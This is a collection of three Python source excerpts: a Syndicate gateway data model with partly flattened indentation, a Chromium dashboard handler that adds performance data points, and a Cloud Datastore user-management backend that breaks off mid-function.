        Unref a driver.
        Delete it if its ref count goes non-positive.
        Do this in an "outer" transaction (i.e. Gateway.Delete, Gateway.Update)
        """
        dk = storagetypes.make_key( GatewayDriver, cls.make_key_name( driver_hash ) )
        d = dk.get()
        if d is None:
            return True
        d.refcount -= 1
        if d.refcount <= 0:
            dk.delete()
        else:
            d.put()
        return True

    @classmethod
    def unref_async( cls, driver_hash ):
        """
        Unref a driver, asynchronously.
        Delete it if its ref count goes non-positive.
        Do this in an "outer" transaction (i.e. Gateway.Delete, Gateway.Update)
        """
        dk = storagetypes.make_key( GatewayDriver, cls.make_key_name( driver_hash ) )
        d = dk.get()
        if d is None:
            return True
        # BUG FIX: this method used "d.ref", but the property is "refcount",
        # and called delete_async() on the entity; async delete lives on the
        # key (mirrors the synchronous unref() above).
        d.refcount -= 1
        if d.refcount <= 0:
            dk.delete_async()
        else:
            d.put_async()
        return True
class Gateway( storagetypes.Object ):
# signed gateaway certificate from the user
gateway_cert = storagetypes.Blob() # protobuf'ed gateway certificate generated and signed by the gateway owner upon creation
# all of the below information is derived from the above signed gateway certificate.
# it is NOT filled in by any method.
gateway_type = storagetypes.Integer(default=0)
owner_id = storagetypes.Integer(default=-1) # ID of the SyndicateUser that owns this gateway
host = storagetypes.String()
port = storagetypes.Integer()
name = storagetypes.String() # name of this gateway
g_id = storagetypes.Integer()
volume_id = storagetypes.Integer(default=-1)
deleted = storagetypes.Boolean(default=False)
gateway_public_key = storagetypes.Text() # PEM-encoded RSA public key to verify control-plane messages (metadata) sent from this gateway.
caps = storagetypes.Integer(default=0) # capabilities
cert_expires = storagetypes.Integer(default=-1) # -1 means "never expires"
cert_version = storagetypes.Integer( default=1 ) # certificate-related version of this gateway
driver_hash = storagetypes.String() # driver hash for this gateway (addresses GatewayDriver). hex string, not byte string
need_cert = storagetypes.Boolean(default=False) # whether or not other gateways in the volume need this gateway's certificate (i.e. will this gateway ever serve data)
# for RPC
key_type = "gateway"
required_attrs = [
"gateway_cert"
]
read_attrs_api_required = [
"driver_hash",
"host",
"port",
"owner_id",
"g_id",
"gateway_type",
"volume_id",
"cert_version",
"cert_expires",
"caps",
]
read_attrs = [
"gateway_public_key",
"name",
] + read_attrs_api_required
# fields an API call can set
write_attrs = [
"gateway_cert"
]
# attrs from the cert that are allowed to change between cert versions
modifiable_cert_attrs = [
"gateway_type",
"host",
"port",
"caps",
"cert_expires",
"cert_version",
"driver_hash",
"gateway_public_key"
]
write_attrs_api_required = write_attrs
default_values = {
"gateway_cert": ""
}
key_attrs = [
"g_id"
]
validators = {
"name": (lambda cls, value: len( unicode(value).translate(dict((ord(char), None) for char in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-.: ")) ) == 0 \
and not is_int(value) \
and len(value) > 0 ),
"gateway_public_key": (lambda cls, value: Gateway.is_valid_key( value, GATEWAY_RSA_KEYSIZE ) )
}
@classmethod
def needs_cert( cls, gateway_type, caps ):
"""
Given a gateway's capabilities, will another gateway need its certificate?
"""
if (caps & (GATEWAY_CAP_WRITE_METADATA | GATEWAY_CAP_WRITE_DATA | GATEWAY_CAP_COORDINATE)) != 0:
return True
return False
def owned_by( self, user ):
return user.owner_id == self.owner_id
def load_pubkey( self, pubkey_str, in_base64=True ):
"""
Load a PEM-encoded RSA public key.
if in_base64 == True, then try to base64-decode it first (i.e. the PEM-encoded
public key is itself base64-encoded again)
return 0 on success
return -EINVAL if the key is invalid
return -EEXIST if the key is the same as the one we have in this Gateway
"""
pubkey_str_unencoded = None
if in_base64:
pubkey_str_unencoded = base64.b64decode( pubkey_str )
else:
pubkey_str_unencoded = pubkey_str
if not Gateway.is_valid_key( pubkey_str_unencoded, GATEWAY_RSA_KEYSIZE ):
return -errno.EINVAL
new_public_key = CryptoKey.importKey( pubkey_str_unencoded ).exportKey()
if self.gateway_public_key is not None and new_public_key == self.gateway_public_key:
return -errno.EEXIST
self.gateway_public_key = new_public_key
return 0
def protobuf_cert( self, cert_pb ):
"""
Populate an ms_gateway_cert structure from our cert
"""
gateway_cert_pb = ms_pb2.ms_gateway_cert.ParseFromString( self.gateway_cert )
cert_pb.CopyFrom( gateway_cert_pb )
def check_caps( self, caps ):
"""
Given a bitmask of caps, verify that all of them are met by our caps.
"""
return (self.caps & caps) == caps
def verify_message( self, msg ):
"""
Verify the authenticity of a received message with a signature field (which should store a base64-encoded signature)
"""
sig = msg.signature
sig_bin = base64.b64decode( sig )
msg.signature = ""
msg_str = msg.SerializeToString()
ret = self.auth_verify( self.gateway_public_key, msg_str, sig_bin )
msg.signature = sig
return ret
def authenticate_session( self, g_type, g_id, url, signature_b64 ):
"""
Verify that the signature over the constructed string "${g_type}_${g_id}:${url}"
was signed by this gateway's private key.
"""
sig = base64.b64decode( signature_b64 )
data = "%s_%s:%s" % (g_type, g_id, url)
ret = self.auth_verify( self.gateway_public_key, data, sig )
return ret
@classmethod
def cert_to_dict( cls, gateway_cert ):
"""
Convert a protobuf structure to a dict of values,
using the Gateway property names.
"""
# unpack certificate
cert_version = gateway_cert.version
gateway_name = gateway_cert.name
gateway_type = gateway_cert.gateway_type
gateway_id = gateway_cert.gateway_id
host = gateway_cert.host
port = gateway_cert.port
pubkey_pem = gateway_cert.public_key
cert_expires = gateway_cert.cert_expires
requested_caps = gateway_cert.caps
driver_hash = binascii.hexlify( gateway_cert.driver_hash )
volume_id = gateway_cert.volume_id
owner_id = gateway_cert.owner_id
kwargs = {
"cert_version": cert_version,
"name": gateway_name,
"gateway_type": gateway_type,
"host": host,
"port": port,
"gateway_public_key": pubkey_pem,
"cert_expires": cert_expires,
"caps": requested_caps,
"driver_hash": driver_hash,
"volume_id": volume_id,
"owner_id": owner_id,
"g_id": gateway_id,
"gateway_cert": gateway_cert.SerializeToString()
}
return kwargs
@classmethod
def Create( cls, user, volume, gateway_cert, driver_text ):
"""
Create a gateway, using its user-signed gateway certificate.
NOTE: the caller must verify the authenticity of the certificate.
"""
kwargs = cls.cert_to_dict( gateway_cert )
# sanity check
if kwargs['volume_id'] != volume.volume_id:
raise Exception("Volume ID mismatch: cert has %s; expected %s" % (kwargs['volume_id'], volume.volume_id))
if kwargs['owner_id'] != user.owner_id:
raise Exception("User ID mismatch: cert has %s; expected %s" % (kwargs['owner_id'], user.owner_id) )
# sanity check: do we have everything we need?
missing = cls.find_missing_attrs( kwargs )
if len(missing) != 0:
raise Exception( "Missing attributes: %s" % (", ".join( missing )))
# sanity check: are our fields valid?
invalid = cls.validate_fields( kwargs )
if len(invalid) != 0:
raise Exception( "Invalid values for fields: %s" % (", ".join( invalid )) )
# sanity check: does the driver match the driver's hash in the cert?
if driver_text is not None:
driver_hash = GatewayDriver.hash_driver( driver_text )
if driver_hash != binascii.hexlify( gateway_cert.driver_hash ):
raise Exception("Driver hash mismatch: len = %s, expected = %s, got = %s" % (len(driver_text), driver_hash, binascii.hexlify( cert.driver_hash )))
gateway_type = kwargs['gateway_type']
# enforce cert distribution
kwargs['need_cert'] = Gateway.needs_cert( gateway_type, kwargs['caps'] )
g_id = kwargs['g_id']
g_key_name = Gateway.make_key_name( g_id=g_id )
g_key = storagetypes.make_key( cls, g_key_name )
# create a nameholder and this gateway at once---there's a good chance we'll succeed
futs = []
gateway_nameholder_fut = GatewayNameHolder.create_async( kwargs['name'], g_id )
gateway_fut = cls.get_or_insert_async( g_key_name, **kwargs )
futs = [gateway_nameholder_fut, gateway_fut]
gateway_driver = None
if driver_text is not None:
gateway_driver = GatewayDriver.create_or_ref( driver_text )
# wait for operations to complete
storagetypes.wait_futures( futs )
# check for collision...
gateway_nameholder = gateway_nameholder_fut.get_result()
gateway = gateway_fut.get_result()
to_rollback = []
if gateway_driver is not None:
to_rollback.append( gateway_driver.key )
if gateway_nameholder.g_id != g_id:
# name collision...
to_rollback.append( g_key )
storagetypes.deferred.defer( Gateway.delete_all, to_rollback )
raise Exception( "Gateway '%s' already exists!" % kwargs['name'] )
if gateway.g_id != g_id:
# ID collision...
to_rollback.append( gateway_nameholder.key )
to_rollback.append( g_key )
storagetypes.deferred.defer( Gateway.delete_all, to_rollback )
raise Exception( "Gateway ID collision. Please try again." )
# we're good!
return g_key
@classmethod
@storagetypes.concurrent
def Read_Async( cls, key, deleted=False ):
gw = yield key.get_async()
if gw is None:
storagetypes.concurrent_return(None)
if gw.deleted and not deleted:
storagetypes.concurrent_return(None)
storagetypes.concurrent_return(gw)
@classmethod
def Read( cls, g_name_or_id, async=False, use_memcache=True, deleted=False ):
"""
Given a Gateway name or ID, read its record. Optionally cache it.
"""
# id or name?
gateway_id = None
gateway_name = None
try:
g_id = int( g_name_or_id )
except:
gateway_name = g_name_or_id
return cls.Read_ByName( gateway_name, async=async, use_memcache=use_memcache )
key_name = Gateway.make_key_name( g_id=g_id )
g = None
if use_memcache:
g = storagetypes.memcache.get( key_name )
if g is not None and not deleted and g.deleted:
storagetypes.memcache.delete( key_name )
g = None
if g is None:
g_key = storagetypes.make_key( cls, Gateway.make_key_name( g_id=g_id ) )
if async:
g_fut = cls.Read_Async( g_key, deleted=deleted )
return g_fut
else:
g = g_key.get( use_memcache=False )
if g is None:
logging.error("Gateway %s not found at all!" % g_id)
if g.deleted:
g = None
elif use_memcache and g is not None:
storagetypes.memcache.set( key_name, g )
else:
if g is not None and not deleted and g.deleted:
storagetypes.memcache.delete( key_name )
g = None
if async:
if g is None or (not deleted and g.deleted):
g = storagetypes.FutureWrapper( None )
else:
g = storagetypes.FutureWrapper( g )
else:
if g is not None and g.deleted:
g = None
return g
@classmethod
def Read_ByName_name_cache_key( cls, gateway_name ):
g_name_to_id_cache_key = "Read_ByName: Gateway: %s" % gateway_name
return g_name_to_id_cache_key
@classmethod
def Read_ByName( cls, gateway_name, async=False, use_memcache=True ):
"""
Given a gateway name, look it up and optionally cache it.
"""
g_name_to_id_cache_key = None
if use_memcache:
g_name_to_id_cache_key = Gateway.Read_ByName_name_cache_key( gateway_name )
g_id = storagetypes.memcache.get( g_name_to_id_cache_key )
if g_id != None and isinstance( g_id, int ):
return cls.Read( g_id, async=async, use_memcache=use_memcache )
# no dice
if async:
g_fut = cls.ListAll( {"Gateway.name ==": gateway_name, "Gateway.deleted ==": False}, async=async )
return storagetypes.FutureQueryWrapper( g_fut )
else:
g = cls.ListAll( {"Gateway.name ==": gateway_name, "Gateway.deleted ==": False}, async=async )
if len(g) > 1:
raise Exception( "More than one Gateway named '%s'" % (gateway_name) )
if g:
g = g[0]
else:
g = None
if use_memcache:
if g:
to_set = {
g_name_to_id_cache_key: g.g_id,
Gateway.make_key_name( g_id=g_id ): g
}
storagetypes.memcache.set_multi( to_set )
return g
@classmethod
def ReadDriver( cls, driver_hash ):
"""
Given a driver's hash, return the driver.
"""
driver_hash = driver_hash.lower()
driver_key_name = GatewayDriver.make_key_name( driver_hash )
driver = storagetypes.memcache.get( driver_key_name )
if driver is not None:
return driver
driver_key = storagetypes.make_key( GatewayDriver, driver_key_name )
driver = driver_key.get()
if driver is None:
return None
driver_text = driver.driver_text
if driver is not None:
storagetypes.memcache.set( driver_key_name, driver_text )
return driver_text
@classmethod
def SetCache( cls, g_id, gateway ):
"""
Cache a loaded gateway.
"""
gateway_key_name = Gateway.make_key_name( g_id=g_id )
storagetypes.memcache.set(gateway_key_name, gateway)
@classmethod
def FlushCache( cls, g_id ):
"""
Purge cached copies of this gateway
"""
gateway_key_name = Gateway.make_key_name( g_id=g_id )
storagetypes.memcache.delete(gateway_key_name)
@classmethod
def FlushCacheDriver( cls, driver_hash ):
"""
Purge cached copies of this gateway's driver
"""
driver_key_name = GatewayDriver.make_key_name( driver_hash )
storagetypes.memcache.delete(driver_key_name)
@classmethod
def Update( cls, gateway_cert, new_driver=None ):
'''
Update a gateway identified by ID with a new certificate.
Do not call this method directly.
Return the gateway record's key on success
Raise an exception on error.
NOTE: the caller must verify the authenticity of the certificate.
Only the volume owner should be able to update a gateway cert's capabilities.
'''
fields = cls.cert_to_dict( gateway_cert )
g_id = fields['g_id']
# validate...
invalid = cls.validate_fields( fields )
if len(invalid) != 0:
raise Exception( "Invalid values for fields: %s" % (", ".join( invalid )) )
new_driver_hash = None
old_driver_hash = None
# sanity check...
if new_driver is not None:
new_driver_hash = GatewayDriver.hash_driver( new_driver )
if binascii.hexlify( gateway_cert.driver_hash ) != new_driver_hash:
raise Exception("Certificate driver hash mismatch: expected %s, got %s" % (binascii.hexlify( gateway_cert.driver_hash ), new_driver_hash))
# drop cert; we'll store it separately
gateway_cert_bin = fields['gateway_cert']
del fields['gateway_cert']
def update_txn( fields ):
'''
Update the Gateway transactionally.
'''
g_id = fields['g_id']
gateway = cls.Read(g_id)
if gateway is None:
# gateway does not exist...
raise Exception("No Gateway with the ID %d exists.", g_id)
old_driver_hash = gateway.driver_hash
# verify update
unwriteable = []
for (k, v) in fields.items():
if k not in cls.modifiable_cert_attrs and getattr(gateway, k) != v:
unwriteable.append(k)
if len(unwriteable) > 0:
raise Exception("Tried to modify read-only fields: %s" % ",".join(unwriteable))
# sanity check: valid version?
if gateway.cert_version >= gateway_cert.version:
raise Exception("Stale Gateway certificate: expected > %s; got %s" % (gateway.cert_version, gateway_cert.version))
# apply update
for (k,v) in fields.items():
setattr( gateway, k, v )
gateway.need_cert = cls.needs_cert( gateway.gateway_type, fields['caps'] )
gateway.gateway_cert = gateway_cert_bin
gw_key = gateway.put()
if old_driver_hash is not None:
# unref the old one
GatewayDriver.unref( old_driver_hash )
cls.FlushCacheDriver( old_driver_hash )
# purge from cache
cls.FlushCache( g_id )
return gw_key
gateway_key = None
try:
gateway_key = storagetypes.transaction( lambda: update_txn( fields ), xg=True )
assert gateway_key is not None, "Transaction failed"
except Exception, e:
logging.exception( e )
raise e
# update the driver as well
if new_driver is not None:
GatewayDriver.create_or_ref( new_driver )
return gateway_key
@classmethod
def Delete( cls, g_name_or_id ):
"""
Given a gateway ID, delete the corresponding gateway.
That is, set it's "deleted" flag so it no longer gets read.
Unref the driver as well.
"""
gateway = Gateway.Read( g_name_or_id )
if gateway:
g_id = gateway.g_id
else:
raise Exception("No such Gateway '%s'" % g_name_or_id )
key_name = Gateway.make_key_name( g_id=g_id )
def set_deleted():
# atomically set the gateway to deleted
g_key = storagetypes.make_key( cls, key_name )
gw = g_key.get()
if gw is None:
return None
gw.deleted = True
gw.put()
return gw.key
storagetypes.transaction( lambda: set_deleted() )
g_name_key = storagetypes.make_key( GatewayNameHolder, GatewayNameHolder.make_key_name( gateway.name ) )
g_name_delete_fut = g_name_key.delete_async()
driver_fut = GatewayDriver.unref_async( gateway.driver_hash )
storagetypes.wait_futures( [g_name_delete_fut, driver_fut] )
Gateway.FlushCache( g_id )
Gateway.FlushCacheDriver( gateway.driver_hash )
g_name_to_id_cache_key = Gateway.Read_ByName_name_cache_key( g_name_or_id )
storagetypes.memcache.delete( g_name_to_id_cache_key )
return True
@classmethod
def DeleteAll( cls, volume ):
"""
Given a Volume, delete all Gateways attached to it.
It's best to run this as a deferred task.
"""
def __delete_gw( gateway ):
cls.Delete( gateway.g_id )
cls.ListAll( {"Gateway.volume_id ==": volume.volume_id}, map_func=__delete_gw, projection=["g_id"] )
return True
| |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""URL endpoint to add new graph data to the datastore."""
import json
import logging
from google.appengine.api import datastore_errors
from google.appengine.ext import ndb
from dashboard import add_point
from dashboard import find_anomalies
from dashboard import graph_revisions
from dashboard import units_to_direction
from dashboard.common import datastore_hooks
from dashboard.common import request_handler
from dashboard.common import stored_object
from dashboard.common import utils
from dashboard.models import anomaly
from dashboard.models import graph_data
BOT_WHITELIST_KEY = 'bot_whitelist'
class AddPointQueueHandler(request_handler.RequestHandler):
    """Request handler to process points and add them to the datastore.

    This request handler is intended to be used only by requests using the
    task queue; it shouldn't be directly from outside.
    """

    def get(self):
        """A get request is the same a post request for this endpoint."""
        self.post()

    def post(self):
        """Adds a set of points from the post data.

        Request parameters:
          data: JSON encoding of a list of dictionaries. Each dictionary
              represents one point to add. For each dict, one Row entity
              will be added, and any required TestMetadata or Master or Bot
              entities will be created.
        """
        datastore_hooks.SetPrivilegedRequest()
        data = json.loads(self.request.get('data'))
        # Warm the in-context NDB cache before the many gets in _AddRow.
        _PrewarmGets(data)
        bot_whitelist = stored_object.Get(BOT_WHITELIST_KEY)
        all_put_futures = []
        added_rows = []
        monitored_test_keys = []
        for row_dict in data:
            try:
                new_row, parent_test, put_futures = _AddRow(row_dict, bot_whitelist)
                added_rows.append(new_row)
                # Only sheriffed tests that already have rows are checked
                # for anomalies below.
                is_monitored = parent_test.sheriff and parent_test.has_rows
                if is_monitored:
                    monitored_test_keys.append(parent_test.key)
                all_put_futures.extend(put_futures)
            except add_point.BadRequestError as e:
                # An invalid point is skipped; the rest of the batch proceeds.
                logging.error('Could not add %s, it was invalid.', e.message)
            except datastore_errors.BadRequestError as e:
                # A datastore-level failure aborts the entire batch.
                logging.info('While trying to store %s', row_dict)
                logging.error('Datastore request failed: %s.', e.message)
                return
        ndb.Future.wait_all(all_put_futures)
        # Reference-build runs are excluded from anomaly processing.
        tests_keys = [k for k in monitored_test_keys if not _IsRefBuild(k)]
        # Updating of the cached graph revisions should happen after put because
        # it requires the new row to have a timestamp, which happens upon put.
        futures = [
            graph_revisions.AddRowsToCacheAsync(added_rows),
            find_anomalies.ProcessTestsAsync(tests_keys)]
        ndb.Future.wait_all(futures)
def _PrewarmGets(data):
    """Prepares the cache so that fetching is faster later.

    The add_point request handler does a LOT of gets, and it's possible for
    each to take seconds.

    However, NDB will does automatic in-context caching:
    https://developers.google.com/appengine/docs/python/ndb/cache#incontext
    This means that doing an async get() at the start will cache the result, so
    that we can prewarm the cache for everything we'll need throughout the
    request at the start.

    Args:
      data: The request json.
    """
    # Prewarm lookups of masters, bots, and tests.
    master_keys = {ndb.Key('Master', row['master']) for row in data}
    bot_keys = {ndb.Key('Master', row['master'], 'Bot', row['bot']) for row in data}
    test_keys = set()
    for row in data:
        # Each prefix of the slash-separated test path is its own key.
        path = '%s/%s' % (row['master'], row['bot'])
        for piece in row['test'].split('/'):
            if not piece:
                break
            path += '/%s' % piece
            test_keys.add(ndb.Key('TestMetadata', path))
    ndb.get_multi_async(list(master_keys) + list(bot_keys) + list(test_keys))
def _AddRow(row_dict, bot_whitelist):
    """Adds a Row entity to the datastore.

    There are three main things that are needed in order to make a new entity;
    the ID, the parent key, and all of the properties. Making these three
    things, and validating the related input fields, are delegated to
    sub-functions.

    Args:
      row_dict: A dictionary obtained from the JSON that was received.
      bot_whitelist: A list of whitelisted bots names.

    Returns:
      A triple: The new row, the parent test, and a list of entity put futures.

    Raises:
      add_point.BadRequestError: The input dict was invalid.
      RuntimeError: The required parent entities couldn't be created.
    """
    parent_test = _GetParentTest(row_dict, bot_whitelist)
    test_container_key = utils.GetTestContainerKey(parent_test.key)
    columns = add_point.GetAndValidateRowProperties(row_dict)
    # Rows inherit the parent test's visibility.
    columns['internal_only'] = parent_test.internal_only
    row_id = add_point.GetAndValidateRowId(row_dict)
    # Update the last-added revision record for this test.
    master, bot, test = row_dict['master'], row_dict['bot'], row_dict['test']
    test_path = '%s/%s/%s' % (master, bot, test)
    last_added_revision_entity = graph_data.LastAddedRevision(
        id=test_path, revision=row_id)
    entity_put_futures = []
    entity_put_futures.append(last_added_revision_entity.put_async())
    # If the row ID isn't the revision, that means that the data is Chrome OS
    # data, and we want the default revision to be Chrome version.
    if row_id != row_dict.get('revision'):
        columns['a_default_rev'] = 'r_chrome_version'
    # Create the entity and add it asynchronously.
    new_row = graph_data.Row(id=row_id, parent=test_container_key, **columns)
    entity_put_futures.append(new_row.put_async())
    return new_row, parent_test, entity_put_futures
def _GetParentTest(row_dict, bot_whitelist):
    """Gets the parent test for a Row based on an input dictionary.

    Args:
      row_dict: A dictionary from the data parameter.
      bot_whitelist: A list of whitelisted bot names.

    Returns:
      A TestMetadata entity.

    Raises:
      RuntimeError: Something went wrong when trying to get the parent test.
    """
    master = row_dict.get('master')
    bot = row_dict.get('bot')
    test = row_dict.get('test').strip('/')
    # Derive the optional metadata for the leaf test.
    direction = _ImprovementDirection(row_dict.get('higher_is_better'))
    internal = BotInternalOnly(bot, bot_whitelist)
    return GetOrCreateAncestors(
        master, bot, test, internal_only=internal,
        benchmark_description=row_dict.get('benchmark_description'),
        units=row_dict.get('units'),
        improvement_direction=direction,
        unescaped_story_name=row_dict.get('unescaped_story_name'))
def _ImprovementDirection(higher_is_better):
    """Returns an improvement direction (constant from alerts_data) or None."""
    if higher_is_better is None:
        return None
    if higher_is_better:
        return anomaly.UP
    return anomaly.DOWN
def BotInternalOnly(bot_name, bot_whitelist):
    """Checks whether a given bot name is internal-only.

    If a bot name is internal only, then new data for that bot should be marked
    as internal-only.
    """
    if bot_whitelist:
        # Whitelisted bots are public; everything else is internal-only.
        return bot_name not in bot_whitelist
    logging.warning(
        'No bot whitelist available. All data will be internal-only. If this '
        'is not intended, please add a bot whitelist using /edit_site_config.')
    return True
def GetOrCreateAncestors(
    master_name, bot_name, test_name, internal_only=True,
    benchmark_description='', units=None, improvement_direction=None,
    unescaped_story_name=None):
    """Gets or creates all parent Master, Bot, TestMetadata entities for a Row."""
    master_entity = _GetOrCreateMaster(master_name)
    _GetOrCreateBot(bot_name, master_entity.key, internal_only)
    # Add all ancestor tests to the datastore in order.
    ancestor_test_parts = test_name.split('/')
    test_path = '%s/%s' % (master_name, bot_name)
    suite = None
    for index, ancestor_test_name in enumerate(ancestor_test_parts):
        # Certain properties should only be updated if the TestMetadata is for a
        # leaf test.
        is_leaf_test = (index == len(ancestor_test_parts) - 1)
        test_properties = {
            'units': units if is_leaf_test else None,
            'internal_only': internal_only,
        }
        if is_leaf_test and improvement_direction is not None:
            test_properties['improvement_direction'] = improvement_direction
        if is_leaf_test and unescaped_story_name is not None:
            test_properties['unescaped_story_name'] = unescaped_story_name
        ancestor_test = _GetOrCreateTest(
            ancestor_test_name, test_path, test_properties)
        if index == 0:
            # The first component under master/bot is the benchmark suite.
            suite = ancestor_test
        test_path = ancestor_test.test_path
    if benchmark_description and suite.description != benchmark_description:
        # NOTE(review): the description is only assigned in memory here;
        # presumably persisted by a later put() elsewhere -- confirm.
        suite.description = benchmark_description
    # Returns the leaf TestMetadata (last one created in the loop).
    return ancestor_test
def _GetOrCreateMaster(name):
    """Gets or creates a new Master."""
    master = graph_data.Master.get_by_id(name)
    if master:
        return master
    master = graph_data.Master(id=name)
    master.put()
    return master
def _GetOrCreateBot(name, parent_key, internal_only):
    """Gets or creates a new Bot under the given Master."""
    bot = graph_data.Bot.get_by_id(name, parent=parent_key)
    if bot:
        # Keep the stored visibility in sync with the requested one.
        if bot.internal_only != internal_only:
            bot.internal_only = internal_only
            bot.put()
        return bot
    logging.info('Adding bot %s/%s', parent_key.id(), name)
    bot = graph_data.Bot(
        id=name, parent=parent_key, internal_only=internal_only)
    bot.put()
    return bot
def _GetOrCreateTest(name, parent_test_path, properties):
    """Either gets an entity if it already exists, or creates one.

    If the entity already exists but the properties are different than the ones
    specified, then the properties will be updated first. This implies that a
    new point is being added for an existing TestMetadata, so if the TestMetadata
    has been previously marked as deprecated then it can be updated and marked as
    non-deprecated.

    If the entity doesn't yet exist, a new one will be created with the given
    properties.

    Args:
      name: The string ID of the Test to get or create.
      parent_test_path: The test_path of the parent entity.
      properties: A dictionary of properties that should be set.

    Returns:
      An entity (which has already been put).

    Raises:
      datastore_errors.BadRequestError: Something went wrong getting the entity.
    """
    test_path = '%s/%s' % (parent_test_path, name)
    existing = graph_data.TestMetadata.get_by_id(test_path)

    if not existing:
        # Add improvement direction if this is a new test.
        if 'units' in properties and 'improvement_direction' not in properties:
            units = properties['units']
            direction = units_to_direction.GetImprovementDirection(units)
            properties['improvement_direction'] = direction
        elif 'units' not in properties or properties['units'] is None:
            # No units at all: direction cannot be derived.
            properties['improvement_direction'] = anomaly.UNKNOWN
        new_entity = graph_data.TestMetadata(id=test_path, **properties)
        new_entity.put()
        # TODO(sullivan): Consider putting back Test entity in a scoped down
        # form so we can check if it exists here.
        return new_entity

    # Flag indicating whether we want to re-put the entity before returning.
    properties_changed = False

    if existing.deprecated:
        # A new point arriving for a deprecated test un-deprecates it.
        existing.deprecated = False
        properties_changed = True

    # Special case to update improvement direction from units for TestMetadata
    # entities when units are being updated. If an improvement direction is
    # explicitly provided in the properties, then we can skip this check since it
    # will get overwritten below. Additionally, by skipping we avoid
    # touching the entity and setting off an expensive put() operation.
    if properties.get('improvement_direction') is None:
        units = properties.get('units')
        if units:
            direction = units_to_direction.GetImprovementDirection(units)
            if direction != existing.improvement_direction:
                properties['improvement_direction'] = direction

    # Go through the list of general properties and update if necessary.
    for prop, value in properties.items():
        if (hasattr(existing, prop) and value is not None and
            getattr(existing, prop) != value):
            setattr(existing, prop, value)
            properties_changed = True

    if properties_changed:
        existing.put()
    return existing
def _IsRefBuild(test_key):
"""Checks whether a TestMetadata is for a reference build test run."""
test_parts = test_key.id().split('/')
return test_parts[-1] == 'ref' or test_parts[-1].endswith('_ref')
| |
import usermgmtlib.usermgmt as usermgmt
from usermgmtlib.backends import Backend, Singleton
import google.auth
from google.cloud import datastore
def sanitize_attribute(item, attr):
    """Return item[attr] normalized to text.

    bytes values are decoded as UTF-8; lists have their bytes elements
    decoded; everything else is returned unchanged.  A missing key (or a
    value without the expected methods) yields None.
    """
    try:
        value = item[attr]
        if isinstance(value, str):
            return value
        elif isinstance(value, bytes):
            return value.decode('utf-8')
        elif isinstance(value, list):
            # Bug fix: only bytes need decoding.  The original tested
            # isinstance(i, str) and called .decode(), which raises
            # AttributeError on Python 3 and made the whole call return
            # None for any list containing str items.
            return [i.decode('utf-8') if isinstance(i, bytes) else i
                    for i in value]
        else:
            return value
    except (KeyError, AttributeError):
        return None
class Role(usermgmt.Role):
    """Datastore-backed role."""

    def refresh(self):
        """Reload this role's attributes from the datastore."""
        fresh = connection().get_role(self.rolename)
        self.__dict__.update(fresh.__dict__)
        return True

    def save(self):
        """Persist this role, replacing any existing entity."""
        conn = connection()
        conn.delete_role(self.rolename)
        entity = conn.new_ds_entity('usermgmt_roles', self.rolename)
        entity.update(self.get_dict())
        entity['groups'] = list(self.groups)
        conn.client.put(entity)
        return True
class Group(usermgmt.Group):
    """Datastore-backed group."""

    def refresh(self):
        """Reload this group's attributes from the datastore."""
        fresh = connection().get_group(self.groupname)
        self.__dict__.update(fresh.__dict__)
        return True

    def save(self):
        """Persist this group, replacing any existing entity."""
        conn = connection()
        conn.delete_group(self.groupname)
        entity = conn.new_ds_entity('usermgmt_groups', self.groupname)
        entity.update(self.get_dict())
        conn.client.put(entity)
        return True
class User(usermgmt.User):
    """Datastore-backed user."""

    def set(self, attribute, value):
        """Refresh, set a single attribute, and persist the user."""
        self.refresh()
        setattr(self, attribute, value)
        self.save()
        return True

    def refresh(self):
        """Reload this user's attributes from the datastore."""
        fresh = connection().get_user(self.username)
        self.__dict__.update(fresh.__dict__)
        return True

    def save(self):
        """Persist this user, replacing any existing entity."""
        conn = connection()
        conn.delete_user(self.username)
        entity = conn.new_ds_entity('usermgmt_users', self.username)
        entity.update(self.get_dict())
        entity['public_keys'] = list(self.public_keys)
        entity['groups'] = list(self.groups)
        conn.client.put(entity)
        return True
class connection(Backend, metaclass=Singleton):
    """Google Cloud Datastore backend for user management.

    Entities live in three kinds -- 'usermgmt_users', 'usermgmt_groups'
    and 'usermgmt_roles' -- keyed by user/group/role name.

    Note: the original declared ``__metaclass__ = Singleton``, which is
    Python 2 syntax and has no effect on Python 3; the metaclass is now
    passed in the class statement so the singleton behavior applies.
    """

    def __init__(self):
        self.name = 'datastore'
        # Project is taken from the ambient Google credentials.
        credentials, project = google.auth.default()
        self.client = datastore.Client(project)

    def get_kind_list(self, kind, order=None):
        """Return all entities of `kind`, optionally ordered by a property."""
        query = self.client.query(kind=kind)
        if order:
            query.order = [order]
        return list(query.fetch())

    def delete_ds_key(self, kind, key):
        """Delete the entity with the given kind/key name."""
        return self.client.delete(self.client.key(kind, key))

    def get_ds_entity(self, kind, key):
        """Fetch an entity; returns None if absent, False on lookup error."""
        try:
            return self.client.get(self.client.key(kind, key))
        except Exception:  # was a bare except:; keep best-effort semantics
            print('Entity not found.')
        return False

    def new_ds_entity(self, kind, key):
        """Create a new, unsaved entity with the given kind/key name."""
        return datastore.Entity(key=self.client.key(kind, key))

    def get_users(self):
        """Return all users as User objects."""
        ds_users = self.get_kind_list('usermgmt_users')
        if not ds_users:
            return []
        return [
            User(
                username=u.key.name,
                hash_ldap=sanitize_attribute(u, 'hash_ldap'),
                uidNumber=sanitize_attribute(u, 'uidNumber'),
                email=sanitize_attribute(u, 'email'),
                public_keys=sanitize_attribute(u, 'public_keys'),
                groups=sanitize_attribute(u, 'groups'))
            for u in ds_users
        ]

    def get_groups(self):
        """Return all groups as Group objects."""
        ds_groups = self.get_kind_list('usermgmt_groups')
        if not ds_groups:
            return []
        return [
            Group(groupname=g.key.name, gid=sanitize_attribute(g, 'gid'))
            for g in ds_groups
        ]

    def get_roles(self):
        """Return all roles as Role objects."""
        return [
            Role(rolename=r.key.name, groups=sanitize_attribute(r, 'groups'))
            for r in self.get_kind_list('usermgmt_roles')
        ]

    def get_user(self, username):
        """Return the named User, or False if it does not exist."""
        ds_user = self.get_ds_entity('usermgmt_users', username)
        if not ds_user:
            return False
        return User(
            username=ds_user.key.name,
            hash_ldap=sanitize_attribute(ds_user, 'hash_ldap'),
            password_mod_date=sanitize_attribute(ds_user, 'password_mod_date'),
            email=sanitize_attribute(ds_user, 'email'),
            uidNumber=sanitize_attribute(ds_user, 'uidNumber'),
